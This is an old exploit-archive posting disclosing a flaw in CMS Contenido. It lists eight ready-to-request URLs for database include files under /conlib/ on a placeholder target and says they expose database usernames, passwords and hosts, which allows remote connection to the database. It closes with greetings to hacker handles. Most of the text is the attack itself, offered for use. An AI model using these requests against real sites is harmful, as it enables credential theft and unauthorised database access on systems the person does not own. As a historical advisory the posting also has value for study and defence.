Home / exploitsPDF  

CMScontenido-path.txt

Posted on 18 October 2006

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CMS contenido Path Disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected Software .: CMS contenido download..: http://www.contenido.org/opensourcecms/en/index-a-104.html Risk ..............: high Found by ..........: CvIr.System Contact ...........: CvIr.System[at]gmail.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected File: /conlib/*.inc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Explicasion: http://[target]/conlib/db_msql.inc http://[target]/conlib/db_mssql.inc http://[target]/conlib/db_mysqli.inc http://[target]/conlib/db_oci8.inc http://[target]/conlib/db_odbc.inc http://[target]/conlib/db_oracle.inc http://[target]/conlib/db_pgsql.inc http://[target]/conlib/db_sybase.inc You can see data of the Web like User of db, password, Database, host and thus connect yourselves remotely to the DB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Hanowars|Bacan|xarnuz|Slappter|mnox|Txis|The Shredder|FaLeNcE|Darkness-Mx|Zickox| www.c-group.org

 

TOP